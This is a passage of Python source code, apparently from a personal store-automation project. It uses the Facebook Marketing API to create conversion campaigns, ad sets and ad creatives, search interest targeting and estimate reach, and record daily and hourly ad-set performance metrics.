ad.remote_update(params={"name":name})
class AdsetCreater:
def __call__(self,fbid,url,caption,page_id,interest_ids=[]):
try:
""" ::: Make sure to Check If URL in CAPTION ie NO <redirect_url> &&, request200 url. ::: """
try:get_url_from_body(caption)
except Exception as e: redprint(e); return
""" ::: request200 url ::: """
#h = get_url_from_body(caption)
"""
h = get_url_from_body( "".join(re.findall(r"[a-zA-Z0-9/:- .\n]",caption)) )
while True:
r = requests.get(h) if(h.startswith("http")) else (requests.get( ("https://"+h) ))
t = r.url.split("/")[-1].split("?")[0]
if(200!=r.status_code):
redinput("(before Campaign Creation) \n 200!=status_code for %s\n\n\nASSOCIATED_CAPTION:\n%s\n\n" % (h,caption,"please fix the redirect or something, maybe it was erried"))
elif(200==r.status_code):
redprint("200==status_code for %s\n\n\nASSOCIATED_CAPTION:\n%s" % (h,caption))
break
"""
c = Campaign(parent_id="act_{}".format(fbid))
c["name"] = "Conversions"
c["buying_type"] = "AUCTION"
c["objective"] = "CONVERSIONS"
c.save()
a = AdSet(parent_id="act_{}".format(fbid))
#a["name"] = "US 18+"
a["campaign_id"] = c["id"]
a["daily_budget"] = 500
a["name"] = "US 18+ "# + t
a["optimization_goal"] = "OFFSITE_CONVERSIONS"
a["promoted_object"] = {"custom_event_type": "PURCHASE", "pixel_id": Filter(Shop,Facebook_Business_Ad_Account_ID=fbid)[0].Facebook_Pixel_ID}
a["start_time"] = "%s 6:00:00 EST"%(Date().dt(0) if datetime.now().hour in [0,1,2] else Date().dt(1))
#@[2018.12.6 10:26 PM[mvdto(-1)]]a["start_time"] = "%s 5:00:00 EST"%(Date().dt(1) if datetime.now().hour in [0,1,2] else Date().dt(2))
a["billing_event"] = "IMPRESSIONS"
a["bid_strategy"] = "LOWEST_COST_WITHOUT_CAP"
a["targeting"] = dict(age_min = 18,
device_platforms = ["mobile"],
facebook_positions = ["feed"],
publisher_platforms = ["facebook"],
targeting_optimization = "none",
geo_locations = {"countries": ["US"], "location_types": ["home", "recent"]},
flexible_spec = t_format_ids(interest_ids),
)
a.save()
v = Ad(parent_id="act_{}".format(fbid))
#@[2018.12.8][Tried accessing nonexisting field (url_tags) on node type (Adgroup)]v["url_tags"] = "adset_id=%s"%(a["id"])
v["name"] = "US 18+ "# + t
v["adset_id"] = a["id"]
(lambda fbid=fbid,url=url,caption=caption,page_id=page_id: [
setitem(globals(),"image",AdImage(parent_id="act_{}".format(fbid))) ,
#setitem(globals()["image"],"filename", Images().contrast_sharpen(Images().download_and_resize(url, 1200))) ,
setitem(globals()["image"],"filename", Images().contrast_sharpen(Images().download_and_resize(url, 1200),contrast=True,sharpen=False)) ,
globals()["image"].remote_create() ,
setitem(globals(),"photo_data",AdCreativePhotoData()) ,
setitem(globals()["photo_data"],"image_hash",globals()["image"]["hash"]) ,
setitem(globals()["photo_data"],"caption",caption) ,
setitem(globals()["photo_data"],"page_welcome_message","Hello. Do you need any assistance?") ,
setitem(globals(),"object_story_spec",AdCreativeObjectStorySpec()) ,
setitem(globals()["object_story_spec"],"page_id",page_id) ,
setitem(globals()["object_story_spec"],"photo_data",globals()["photo_data"]) ,
setitem(globals(),"creative",AdCreative(parent_id="act_%s"%fbid)) ,
setitem(globals()["creative"],"name","Dark Post") ,
setitem(globals()["creative"],"object_story_spec",globals()["object_story_spec"]) ,
setitem(globals()["creative"],"url_tags","&zcli=%s"%( Recompilate().recompilate(str(a["id"])).x )) ,
"ajergcwonirgsncraoigncasdfkadpaksogranopgas;nrgoasingr" ,
# globals()["creative"].remote_create() ,
])()
v["creative"] = globals()["creative"]
if ADSET_TESTING == True:
a["status"] = "PAUSED"
a.remote_update()
v.save()
return int(a["campaign_id"]), int(v["adset_id"])
except Exception as e:
redprint(e)
redprint("deleting ")
OSA.notify("deleting. ")
OSA.notify(str(e))
tryprocess(c.remote_delete); tryprocess(a.remote_delete); tryprocess(v.remote_delete)
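# Usage sketch (mirrors the call made from create_ad above; values hypothetical). Note that the caption
# must contain a URL or the get_url_from_body check at the top of __call__ bails out early:
#   campaign_id, adset_id = AdsetCreater()(fbid="1234567890", url="https://cdn.example.com/item.jpg",
#       caption="Click Below\nexample.com/widget", page_id="987654321", interest_ids=[])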
class Adsetinsight_Algorithms:
def one(self):
""" ::: Get all adsethourlyinsights with sales. Then, keep adding impressions, get average hour/impression count of 1st sale. :::"""
x = [keysort("date",Adsethourlyinsight.objects.filter(adset_id=i),tcer=False) for i in set(key("adset_id",Adsethourlyinsight.objects.all())) if list(set(key("website_purchase", Adsethourlyinsight.objects.filter(adset_id=i)))) != [0]]
v = []
for i in x:
impressions = 0
for idx,j in enumerate(i):
impressions += j.impression
if j.website_purchase != 0:
v.append([impressions, idx])
break
print( "hour ", sum([b[1] for b in v])/len(v) )
print( "impressions", sum([b[0] for b in v])/len(v) )
def one_data(self):
""" ::: Get all adsethourlyinsights with sales. Then, keep adding impressions, get average hour/impression count of 1st sale. :::"""
x = set(key("adset_id",Adsethourlyinsightdata.objects.all()))
data = []
for i in x:
if list(set(key("website_purchase_move", Adsethourlyinsightdata.objects.filter(adset_id=i)))) != [0]:
data.append(keysort("date",Adsethourlyinsightdata.objects.filter(adset_id=i),tcer=False) )
v = []
for i in data:
impression_moves = 0
for idx,j in enumerate(i):
impression_moves += j.impression_move
if j.website_purchase_move != 0:
v.append([impression_moves, idx])
break
print( "hour ", sum([b[1] for b in v])/len(v) )
print( "impressions", sum([b[0] for b in v])/len(v) )
def two(self):
for adset in Adset.objects.filter(is_created=True):
if adset.status=="ACTIVE":
data = keysort("date", Adsethourlyinsight.objects.filter(adset_id=adset.adset_id), tcer=False)
impressions = 0; sales = 0
for x in data:
impressions+=x.impression
sales+=x.website_purchase
print(impressions, sales)
if impressions > 500:
if sales < 1:
print("stop")
print("[adset_id][%s]"%adset.adset_id)
input("please check it, impressions: %s, sales: %s" % (impressions, sales))
AdSet(adset.adset_id).remote_update(params={"status":"PAUSED"})
class Interest_Tools(DecisionTree):
def t_format_resp(self, resp):
payload = []
for i in resp:
if i.get('valid',True) == True:
payload.append({'id':i['id'], 'audience_size':i['audience_size'],'name':i['name'],
'category':i.get('disambiguation_category',''), 'topic':i.get('topic','')})
return payload
def t_search(self, q):
resp = TargetingSearch.search(params={'q':q,'type':'adinterest','limit':10000})
return self.t_format_resp(resp)
def t_suggestion(self, names):
resp = TargetingSearch.search(params={'interest_list':list(names), 'type':'adinterestsuggestion', 'limit':10000})
return self.t_format_resp(resp)
def t_format_ids(self, ids):
return [{"interests": [{'id':i} for i in ids]}]
def t_reach_estimate(self, shop, ids=None):
account = AdAccount('act_%s'%shop.Facebook_Business_Ad_Account_ID)
t_spec = {'age_max': 65,
'age_min': 18,
'audience_network_positions': ['classic', 'instream_video', 'rewarded_video'],
'device_platforms': ['mobile', 'desktop'],
'facebook_positions': ['feed', 'right_hand_column', 'instant_article'],
'geo_locations': {'countries': ['US'], 'location_types': ['home']},
'publisher_platforms': ['facebook', 'audience_network'],
'targeting_optimization': 'none',
'flexible_spec': []
}
if ids:
t_spec['flexible_spec'] = self.t_format_ids(ids)
params = {
'currency': 'USD',
'optimize_for': AdSet.OptimizationGoal.offsite_conversions,
'targeting_spec': t_spec, }
reach_estimate = account.get_reach_estimate(params=params)
return reach_estimate[0]["users"]
class InstagramBot:
def __init__(self):
self.bot = ExecutableText().export("InstagramBot")
class October_Keyword_Utilities:
#@[2018.11.23 02:44 PM][I took out the __init__ because i did print the exception in `pool` and i was not able to set the shop that many times in succession. i then got the api call must be set error and then i just set the shop in the beginning]
t_format_ids = lambda self, ids: [{"interests": [{'id':i} for i in ids]}]
def t_format_resp(self, resp):
payload = []
for i in resp:
if i.get('valid',True) == True:
payload.append({'id':i['id'], 'audience_size':i['audience_size'],'name':i['name'],
'category':i.get('disambiguation_category',''), 'topic':i.get('topic','')})
return payload
def receive_interest_dictlist(self, x, niche):
""" ::: Problem: (1)Order (2)integer_ids ::: """
""" ::: Solution: (1)integerify__forloop (2)keysort__id ::: """
for i in x: i["id"] = int(i["id"])
x = keysort("id",x)
if x not in key("keywordlist",All(Facebookkeywordlist)):
Facebookkeywordlist(niche=niche, keywordlist=x, audience_size=October_Keyword_Utilities().re(x)).save()
def re(self, io=None):
if not io: return 1000000000
ids = None
""" ::: if io aint just ids, and its dictlist, ok, make ids the key("id"), else, ids=io(int list) ::: """
if(type(io[0]) not in [str,int]):
ids = key("id",io)
else:
ids = io
account = AdAccount("act_%s"%(a_shop().Facebook_Business_Ad_Account_ID))
t_spec = {'age_max': 65,
'age_min': 18,
'audience_network_positions': ['classic', 'instream_video', 'rewarded_video'],
'device_platforms': ['mobile', 'desktop'],
'facebook_positions': ['feed', 'right_hand_column', 'instant_article'],
'geo_locations': {'countries': ['US'], 'location_types': ['home']},
'publisher_platforms': ['facebook', 'audience_network'],
'targeting_optimization': 'none',
'flexible_spec': []
}
# automatic placements
t_spec = {'age_max': 65,
'age_min': 18,
'geo_locations': {'countries': ['US'], 'location_types': ['home']},
'targeting_optimization': 'none',
'flexible_spec': []
}
# added this 2nd t_spec in as this is how based on 10/2018 targeting was by default
# t_spec = {'age_max': 65,
# 'age_min': 18,
# #'audience_network_positions': ['classic', 'instream_video', 'rewarded_video'],
# 'device_platforms': ['mobile'],
# 'facebook_positions': ['feed'],
# 'geo_locations': {'countries': ['US'],},
# 'publisher_platforms': ['facebook'],
# 'targeting_optimization': 'none',
# 'flexible_spec': []
# }
if ids:
t_spec['flexible_spec'] = t_format_ids(ids)
params = {
#'currency': 'USD',
#'optimize_for': AdSet.OptimizationGoal.offsite_conversions,
'targeting_spec': t_spec, }
reach_estimate = account.get_reach_estimate(params=params)
return reach_estimate[0]["users"]
def t_search(self, q, limit=10000):
resp = TargetingSearch.search(params={'q':q,'type':'adinterest','limit':limit})
return t_format_resp(resp)
def t_suggestion(self, names, limit=10000):
resp = TargetingSearch.search(params={'interest_list':list(names), 'type':'adinterestsuggestion', 'limit':limit})
return t_format_resp(resp)
def se(self, q, limit=50):
#@altered to achieve results with `,` or `\n`
new = []
for q in copy.deepcopy(q).replace("\n",",").split(","):
x = [i for i in json.loads(requests.get(Muta()().targeting_search_url.format(q,limit)).text).get("data",[]) if("interests"==i["type"]) ]
def pool_target(i):
x = dict(id=int(i["id"]),name=i["name"],audience_size=Facebookkeyword.re( int(i["id"]) ) )
return x
if len(x) == 0:
OSA.notify("No Results for `{}`".format(q))
return []
x = pool(pool_target, x, nodes=2).result()
x = [Facebookkeyword(**i) for i in x]
# keycall("save",x)
for i in x: i.save()
x = keycall("zone", x)
new.extend(x)
return new
def su(self, ids, limit=50):
targeting_list = json.dumps([{"id":i,"type":"interests"} for i in ids])
redprint(targeting_list)
x = [i for i in json.loads(requests.get(Muta()().targeting_suggestions_url.format(targeting_list,limit)).text).get("data",[]) if("interests"==i["type"]) ]
def pool_target(i):
x = dict(id=int(i["id"]),name=i["name"],audience_size=Facebookkeyword.re( int(i["id"]) ) )
redprint("hello")
return x
x = pool(pool_target, x, nodes=15).result()
x = [Facebookkeyword(**i) for i in x]
keycall("save",x)
#return keysort("audience_size", x)
x = keycall("zone", x)
return x
class July_Adset_Utilities:
def __init__(self):
r""" This is important since looking at it now I forget the parameters and it looks as if i did not write any of it before"""
#self.shop = shop
# keep these for storage purposes
a_shop()
self.data_all_fields = ["spend","adset_id","date","frequency","impression","impression_cost","impression_rate","post_click","post_click_cost","post_click_rate","click","click_cost","click_rate","add_to_cart","add_to_cart_cost","add_to_cart_rate","website_purchase","website_purchase_cost","website_purchase_rate","spend","website_purchase_value","return_on_investment","reach","reach_cost","reach_rate","landing_page_view","landing_page_view_cost","landing_page_view_rate","fb_pixel_view_content","fb_pixel_view_content_cost","fb_pixel_view_content_rate","fb_pixel_initiate_checkout","fb_pixel_initiate_checkout_cost","fb_pixel_initiate_checkout_rate","page_engagement","page_engagement_cost","page_engagement_rate","post_engagement","post_engagement_cost","post_engagement_rate","post_reaction","post_reaction_cost","post_reaction_rate"]
self.data_fields = ["spend","adset_id","date","frequency","impression","impression_cost","impression_rate","post_click","post_click_cost","post_click_rate","click","click_cost","click_rate","add_to_cart","add_to_cart_cost","add_to_cart_rate","website_purchase","website_purchase_cost","website_purchase_rate","spend","website_purchase_value","return_on_investment"]
self.get_insight_fields = ["adset_id", "action_values", "actions", "adset_name", "clicks", "date_start", "date_stop", "frequency", "impressions", "reach", "relevance_score", "spend"]
self.get_insight_params = {"time_increment": 1, "time_range": {"since": (Date()-0).datestr,"until": (Date()-0).datestr}}
def get_campaigns(self, limit = 500):
return self.shop.fb.get_campaigns(params = {"limit": limit})
def get_adsets(self, campaign_id, limit = 500):
scope_campaign = Campaign(campaign_id)
adsets = scope_campaign.get_ad_sets(params = {"limit": limit})
return adsets
def pause_adset(self, adset_id):
input("is this ok?: ")
shop = Shop()( Adset.objects.get(adset_id=adset_id).shop_abbreviation)
adset = AdSet(adset_id)
adset["status"] = "PAUSED"
status_check = adset.remote_update()
print("adset %s: %s √"%(adset_id, status_check))
assert status_check['status'] == 'PAUSED'
Update(Get(Adset,adset_id=adset_id),status="PAUSED")
def restart_adset(self, adset_id):
input("is this ok?: ")
shop = Shop()( Adset.objects.get(adset_id=adset_id).shop_abbreviation)
adset = AdSet(adset_id)
adset["status"] = "ACTIVE"
status_check = adset.remote_update()
print("adset %s: %s √"%(adset_id, status_check))
assert status_check['status'] == 'ACTIVE'
Update(Get(Adset,adset_id=adset_id),status="ACTIVE")
def update_adset(self, id):
new = Get(Adset,adset_id=id)
data = AdSet(new.adset_id).remote_read(fields=["campaign_id","id"])
new.campaign_id = data["campaign_id"]
new.adset_id = data["id"]
new.save()
def update_adsetinsight_data(self, id, date_start = 5, date_end = 0, time_increment = 1, fields = ["adset_id", "action_values", "actions", "adset_name", "clicks", "date_start", "date_stop", "frequency", "impressions", "reach", "relevance_score", "spend"]):
adset = Filter(Adset, adset_id=id)[0]
self.shop = Shop()( adset.shop_abbreviation)
data = [AttrDict(i.export_all_data()) for i in AdSet(adset.adset_id).get_insights(fields = fields, params={"time_increment": time_increment, "time_range": {"since": (Date()-date_start).datestr,"until": (Date()-date_end).datestr}})]
for i in data:
new = Adsetinsight()
existing = Adsetinsight.objects.filter(adset_id = adset.adset_id, date = Date().myDatetimenow(Date(i.date_start).dateobj))
if len(existing) == 1:
new = existing[0]
print("an existing")
actions = i.get("actions", {})
action_values = i.get("action_values", {})
actions_dict = AttrDict(dict(zip(key("action_type", actions), key("value", actions))))
action_values_dict = AttrDict(dict(zip(key("action_type", action_values), key("value", action_values))))
spend = round(float(i.spend), 4)
adset_id = adset.adset_id
date = Date().myDatetimenow(Date(i.date_start).dateobj)
frequency = round(float(i.frequency), 4)
impression = int(i.impressions)
if(0==impression):continue
impression_cost = round(float(tryreturn(lambda: spend / impression)), 4)
impression_rate = 0
post_click = int(i.clicks)
post_click_cost = round(float(tryreturn(lambda: spend / post_click)), 4)
post_click_rate = round(float(tryreturn(lambda: post_click / impression)), 4)
click = int(actions_dict.get("link_click", 0))
click_cost = round(float(tryreturn(lambda: spend / click)), 4)
click_rate = round(float(tryreturn(lambda: click / impression)), 4)
add_to_cart = int(actions_dict.get("offsite_conversion.fb_pixel_add_to_cart", 0))
add_to_cart_cost = round(float(tryreturn(lambda: spend / add_to_cart)), 4)
try:add_to_cart_rate = round(float(tryreturn(lambda: add_to_cart / impression)), 4)
except:add_to_cart_rate = 0 #(?)
website_purchase = int(actions_dict.get("offsite_conversion.fb_pixel_purchase", 0))
##conversion_pixel_purchase = int(actions_dict.get("offsite_conversion", 0))
##if website_purchase > 0 and conversion_pixel_purchase == 0:
## website_purchase = website_purchase
##if website_purchase > 0 and conversion_pixel_purchase > 0:
## website_purchase = ((website_purchase+conversion_pixel_purchase) / 2)
##if website_purchase == 0 and conversion_pixel_purchase > 0:
## website_purchase = conversion_pixel_purchase
website_purchase_cost = round(float(tryreturn(lambda: spend / website_purchase)), 4)
website_purchase_rate = round(float(tryreturn(lambda: website_purchase / impression)), 4)
spend = round(float(i.spend), 4)
website_purchase_value = round(float(action_values_dict.get("offsite_conversion.fb_pixel_purchase", 0)), 4)
return_on_investment = round(float(tryreturn(lambda: website_purchase_value / spend)), 4)
reach = int(i.reach)
reach_cost = round(float(tryreturn(lambda: spend / reach)), 4)
reach_rate = 0
landing_page_view = int(actions_dict.get("landing_page_view", 0))
landing_page_view_cost = round(float(tryreturn(lambda: spend / landing_page_view)), 4)
landing_page_view_rate = round(float(tryreturn(lambda: landing_page_view / impression)), 4)
fb_pixel_view_content = int(actions_dict.get("offsite_conversion.fb_pixel_view_content", 0))
fb_pixel_view_content_cost = round(float(tryreturn(lambda: spend / fb_pixel_view_content)), 4)
fb_pixel_view_content_rate = round(float(fb_pixel_view_content / impression), 4)
fb_pixel_initiate_checkout = int(actions_dict.get("offsite_conversion.fb_pixel_initiate_checkout", 0))
fb_pixel_initiate_checkout_cost = round(float(tryreturn(lambda: spend / fb_pixel_initiate_checkout)), 4)
fb_pixel_initiate_checkout_rate = round(float(fb_pixel_initiate_checkout / impression), 4)
page_engagement = int(actions_dict.get("page_engagement", 0))
page_engagement_cost = round(float(tryreturn(lambda: spend / page_engagement)), 4)
page_engagement_rate = round(float(page_engagement / impression), 4)
post_engagement = int(actions_dict.get("post_engagement", 0))
post_engagement_cost = round(float(tryreturn(lambda: spend / post_engagement)), 4)
post_engagement_rate = round(float(post_engagement / impression), 4)
post_reaction = int(actions_dict.get("post_reaction", 0))
post_reaction_cost = round(float(tryreturn(lambda: spend / post_reaction)), 4)
post_reaction_rate = round(float(post_reaction / impression), 4)
greenprint("[update_adsetinsight_data][spend][%s]"% spend)
greenprint("[update_adsetinsight_data][adset_id][%s]"% adset_id)
greenprint("[update_adsetinsight_data][date][%s]"% date)
greenprint("[update_adsetinsight_data][frequency][%s]"% frequency)
greenprint("[update_adsetinsight_data][impression][%s]"% impression)
greenprint("[update_adsetinsight_data][impression_cost][%s]"% impression_cost)
greenprint("[update_adsetinsight_data][impression_rate][%s]"% impression_rate)
greenprint("[update_adsetinsight_data][post_click][%s]"% post_click)
greenprint("[update_adsetinsight_data][post_click_cost][%s]"% post_click_cost)
greenprint("[update_adsetinsight_data][post_click_rate][%s]"% post_click_rate)
greenprint("[update_adsetinsight_data][click][%s]"% click)
greenprint("[update_adsetinsight_data][click_cost][%s]"% click_cost)
greenprint("[update_adsetinsight_data][click_rate][%s]"% click_rate)
greenprint("[update_adsetinsight_data][add_to_cart][%s]"% add_to_cart)
greenprint("[update_adsetinsight_data][add_to_cart_cost][%s]"% add_to_cart_cost)
greenprint("[update_adsetinsight_data][add_to_cart_rate][%s]"% add_to_cart_rate)
greenprint("[update_adsetinsight_data][website_purchase][%s]"% website_purchase)
greenprint("[update_adsetinsight_data][website_purchase_cost][%s]"% website_purchase_cost)
greenprint("[update_adsetinsight_data][website_purchase_rate][%s]"% website_purchase_rate)
greenprint("[update_adsetinsight_data][spend][%s]"% spend)
greenprint("[update_adsetinsight_data][website_purchase][%s]"% website_purchase_value)
greenprint("[update_adsetinsight_data][offsite_conversion][%s]"% website_purchase_value)
greenprint("[update_adsetinsight_data][website_purchase_value][%s]"% website_purchase_value)
greenprint("[update_adsetinsight_data][return_on_investment][%s]"% return_on_investment)
greenprint("[update_adsetinsight_data][reach][%s]"% reach)
greenprint("[update_adsetinsight_data][reach_cost][%s]"% reach_cost)
greenprint("[update_adsetinsight_data][reach_rate][%s]"% reach_rate)
greenprint("[update_adsetinsight_data][landing_page_view][%s]"% landing_page_view)
greenprint("[update_adsetinsight_data][landing_page_view_cost][%s]"% landing_page_view_cost)
greenprint("[update_adsetinsight_data][landing_page_view_rate][%s]"% landing_page_view_rate)
greenprint("[update_adsetinsight_data][fb_pixel_view_content][%s]"% fb_pixel_view_content)
greenprint("[update_adsetinsight_data][fb_pixel_view_content_cost][%s]"% fb_pixel_view_content_cost)
greenprint("[update_adsetinsight_data][fb_pixel_view_content_rate][%s]"% fb_pixel_view_content_rate)
greenprint("[update_adsetinsight_data][fb_pixel_initiate_checkout][%s]"% fb_pixel_initiate_checkout)
greenprint("[update_adsetinsight_data][fb_pixel_initiate_checkout_cost][%s]"% fb_pixel_initiate_checkout_cost)
greenprint("[update_adsetinsight_data][fb_pixel_initiate_checkout_rate][%s]"% fb_pixel_initiate_checkout_rate)
greenprint("[update_adsetinsight_data][page_engagement][%s]"% page_engagement)
greenprint("[update_adsetinsight_data][page_engagement_cost][%s]"% page_engagement_cost)
greenprint("[update_adsetinsight_data][page_engagement_rate][%s]"% page_engagement_rate)
greenprint("[update_adsetinsight_data][post_engagement][%s]"% post_engagement)
greenprint("[update_adsetinsight_data][post_engagement_cost][%s]"% post_engagement_cost)
greenprint("[update_adsetinsight_data][post_engagement_rate][%s]"% post_engagement_rate)
greenprint("[update_adsetinsight_data][post_reaction][%s]"% post_reaction)
greenprint("[update_adsetinsight_data][post_reaction_cost][%s]"% post_reaction_cost)
greenprint("[update_adsetinsight_data][post_reaction_rate][%s]"% post_reaction_rate)
new.spend = spend
new.ad_account_id = self.shop.Facebook_Business_Ad_Account_ID
new.adset_id = adset_id
new.date = date
new.frequency = frequency
new.impression = impression
new.impression_cost = impression_cost
new.impression_rate = impression_rate
new.post_click = post_click
new.post_click_cost = post_click_cost
new.post_click_rate = post_click_rate
new.click = click
new.click_cost = click_cost
new.click_rate = click_rate
new.add_to_cart = add_to_cart
new.add_to_cart_cost = add_to_cart_cost
new.add_to_cart_rate = add_to_cart_rate
new.website_purchase = website_purchase
new.website_purchase_cost = website_purchase_cost
new.website_purchase_rate = website_purchase_rate
new.spend = spend
new.website_purchase_value = website_purchase_value
new.return_on_investment = return_on_investment
new.reach = reach
new.reach_cost = reach_cost
new.reach_rate = reach_rate
new.landing_page_view = landing_page_view
new.landing_page_view_cost = landing_page_view_cost
new.landing_page_view_rate = landing_page_view_rate
new.fb_pixel_view_content = fb_pixel_view_content
new.fb_pixel_view_content_cost = fb_pixel_view_content_cost
new.fb_pixel_view_content_rate = fb_pixel_view_content_rate
new.fb_pixel_initiate_checkout = fb_pixel_initiate_checkout
new.fb_pixel_initiate_checkout_cost = fb_pixel_initiate_checkout_cost
new.fb_pixel_initiate_checkout_rate = fb_pixel_initiate_checkout_rate
new.page_engagement = page_engagement
new.page_engagement_cost = page_engagement_cost
new.page_engagement_rate = page_engagement_rate
new.post_engagement = post_engagement
new.post_engagement_cost = post_engagement_cost
new.post_engagement_rate = post_engagement_rate
new.post_reaction = post_reaction
new.post_reaction_cost = post_reaction_cost
new.post_reaction_rate = post_reaction_rate
new.save()
# https://developers.facebook.com/docs/marketing-api/click-tags
def update_adsethourlyinsight_data(self, id, date_start = 5, date_end = 0, time_increment = 1, breakdowns=["hourly_stats_aggregated_by_advertiser_time_zone"], fields = ["adset_id", "action_values", "actions", "adset_name", "clicks", "date_start", "date_stop", "frequency", "impressions", "reach", "relevance_score", "spend"]):
"""
date_start = 800
date_end = 0
time_increment = 1
breakdowns=["hourly_stats_aggregated_by_advertiser_time_zone"]
fields = ["adset_id", "action_values", "actions", "adset_name", "clicks", "date_start", "date_stop", "frequency", "impressions", "reach", "relevance_score", "spend"]
insights = adset.get_insights(fields = fields, params={"time_increment": time_increment, "time_range": {"since": (Date()-date_start).datestr,"until": (Date()-date_end).datestr}} )
"""
# used to be date_start = 0 and date_end = 0; that only gets data for `today`, but the day could have only just started (e.g. ~3 hrs in), so date_start = 1 would have been better
#
adset = Filter(Adset,adset_id=id)[0]
self.shop = Shop()( adset.shop_abbreviation)
data = [AttrDict(i.export_all_data()) for i in AdSet(adset.adset_id).get_insights(fields = fields, params={"breakdowns": breakdowns, "time_increment": time_increment, "time_range": {"since": (Date()-date_start).datestr,"until": (Date()-date_end).datestr}})]
for i in data:
new = Adsethourlyinsight()
date = (round((int(i.hourly_stats_aggregated_by_advertiser_time_zone.split(" - ")[0].split(":")[0])/24),2)+Date().myDatetimenow(Date(i.date_start).dateobj) )
distinct_print("[%s][%s]"%(date,i.hourly_stats_aggregated_by_advertiser_time_zone))
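# Note on the date encoding above: each hourly bucket is stored as the day's date plus round(hour / 24, 2),
# so e.g. the 13:00-14:00 window becomes that date + 0.54; the loop below pre-creates a row for each of
# the 24 buckets of the day.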
for d in range(24):
tryprocess(Adsethourlyinsight(ad_account_id=self.shop.Facebook_Business_Ad_Account_ID, date=(Date().myDatetimenow(Date(i.date_start).dateobj)+round((d/24),2)), adset_id=i.adset_id ).save)
existing = Adsethourlyinsight.objects.filter(adset_id = adset.adset_id, date = date)
if len(existing) == 1:
new = existing[0]
print("an existing")
actions = i.get("actions", {})
action_values = i.get("action_values", {})
actions_dict = AttrDict(dict(zip(key("action_type", actions), key("value", actions))))
action_values_dict = AttrDict(dict(zip(key("action_type", action_values), key("value", action_values))))
spend = round(float(i.spend), 4)
adset_id = adset.adset_id
#date = Date().myDatetimenow(Date(i.date_start).dateobj)
#frequency = round(float(i.frequency), 4)
impression = int(i.impressions)
if(0==impression):continue
impression_cost = round(float(tryreturn(lambda: spend / impression)), 4)
impression_rate = 0
post_click = int(i.clicks)
post_click_cost = round(float(tryreturn(lambda: spend / post_click)), 4)
post_click_rate = round(float(tryreturn(lambda: post_click / impression)), 4)
click = int(actions_dict.get("link_click", 0))
click_cost = round(float(tryreturn(lambda: spend / click)), 4)
click_rate = round(float(tryreturn(lambda: click / impression)), 4)
add_to_cart = int(actions_dict.get("offsite_conversion.fb_pixel_add_to_cart", 0))
add_to_cart_cost = round(float(tryreturn(lambda: spend / add_to_cart)), 4)
try:add_to_cart_rate = round(float(tryreturn(lambda: add_to_cart / impression)), 4)
except:add_to_cart_rate = 0 #(?)
website_purchase = int(actions_dict.get("offsite_conversion.fb_pixel_purchase", 0))
#conversion_pixel_purchase = int(actions_dict.get("offsite_conversion", 0))
#if website_purchase > 0 and conversion_pixel_purchase == 0:
# website_purchase = website_purchase
#if website_purchase > 0 and conversion_pixel_purchase > 0:
# website_purchase = ((website_purchase+conversion_pixel_purchase) / 2)
#if website_purchase == 0 and conversion_pixel_purchase > 0:
# website_purchase = conversion_pixel_purchase
website_purchase_cost = round(float(tryreturn(lambda: spend / website_purchase)), 4)
website_purchase_rate = round(float(tryreturn(lambda: website_purchase / impression)), 4)
spend = round(float(i.spend), 4)
website_purchase_value = round(float(action_values_dict.get("offsite_conversion.fb_pixel_purchase", 0)), 4)
return_on_investment = round(float(tryreturn(lambda: website_purchase_value / spend)), 4)
#reach = int(i.reach)
#reach_cost = round(float(tryreturn(lambda: spend / reach)), 4)
#reach_rate = 0
landing_page_view = int(actions_dict.get("landing_page_view", 0))
landing_page_view_cost = round(float(tryreturn(lambda: spend / landing_page_view)), 4)
landing_page_view_rate = round(float(tryreturn(lambda: landing_page_view / impression)), 4)
fb_pixel_view_content = int(actions_dict.get("offsite_conversion.fb_pixel_view_content", 0))
fb_pixel_view_content_cost = round(float(tryreturn(lambda: spend / fb_pixel_view_content)), 4)
fb_pixel_view_content_rate = round(float(fb_pixel_view_content / impression), 4)
fb_pixel_initiate_checkout = int(actions_dict.get("offsite_conversion.fb_pixel_initiate_checkout", 0))
fb_pixel_initiate_checkout_cost = round(float(tryreturn(lambda: spend / fb_pixel_initiate_checkout)), 4)
fb_pixel_initiate_checkout_rate = round(float(fb_pixel_initiate_checkout / impression), 4)
page_engagement = int(actions_dict.get("page_engagement", 0))
page_engagement_cost = round(float(tryreturn(lambda: spend / page_engagement)), 4)
page_engagement_rate = round(float(page_engagement / impression), 4)
post_engagement = int(actions_dict.get("post_engagement", 0))
post_engagement_cost = round(float(tryreturn(lambda: spend / post_engagement)), 4)
post_engagement_rate = round(float(post_engagement / impression), 4)
post_reaction = int(actions_dict.get("post_reaction", 0))
post_reaction_cost = round(float(tryreturn(lambda: spend / post_reaction)), 4)
post_reaction_rate = round(float(post_reaction / impression), 4)
new.spend = spend
new.ad_account_id = self.shop.Facebook_Business_Ad_Account_ID
new.adset_id = adset_id
new.date = date
#new.frequency = frequency
new.impression = impression
new.impression_cost = impression_cost
new.impression_rate = impression_rate
new.post_click = post_click
new.post_click_cost = post_click_cost
new.post_click_rate = post_click_rate
new.click = click
new.click_cost = click_cost
new.click_rate = click_rate
new.add_to_cart = add_to_cart
new.add_to_cart_cost = add_to_cart_cost
new.add_to_cart_rate = add_to_cart_rate
new.website_purchase = website_purchase
new.website_purchase_cost = website_purchase_cost
new.website_purchase_rate = website_purchase_rate
new.spend = spend
new.website_purchase_value = website_purchase_value
new.return_on_investment = return_on_investment
#new.reach = reach
#new.reach_cost = reach_cost
#new.reach_rate = reach_rate
new.landing_page_view = landing_page_view
new.landing_page_view_cost = landing_page_view_cost
new.landing_page_view_rate = landing_page_view_rate
new.fb_pixel_view_content = fb_pixel_view_content
new.fb_pixel_view_content_cost = fb_pixel_view_content_cost
new.fb_pixel_view_content_rate = fb_pixel_view_content_rate
new.fb_pixel_initiate_checkout = fb_pixel_initiate_checkout
new.fb_pixel_initiate_checkout_cost = fb_pixel_initiate_checkout_cost
new.fb_pixel_initiate_checkout_rate = fb_pixel_initiate_checkout_rate
new.page_engagement = page_engagement
new.page_engagement_cost = page_engagement_cost
new.page_engagement_rate = page_engagement_rate
new.post_engagement = post_engagement
new.post_engagement_cost = post_engagement_cost
new.post_engagement_rate = post_engagement_rate
new.post_reaction = post_reaction
new.post_reaction_cost = post_reaction_cost
new.post_reaction_rate = post_reaction_rate
#new.save()
new.save()
def update_adsetinsight_data_find_which_adset_had_the_order(self, date_start = 0, date_end = 0, time_increment = 1, fields = ["adset_id", "action_values", "actions", "adset_name", "clicks", "date_start", "date_stop", "frequency", "impressions", "reach", "relevance_score", "spend"], is_a_shopify_order_match_check=False, is_a_shopify_order_match_check_orders=[]):
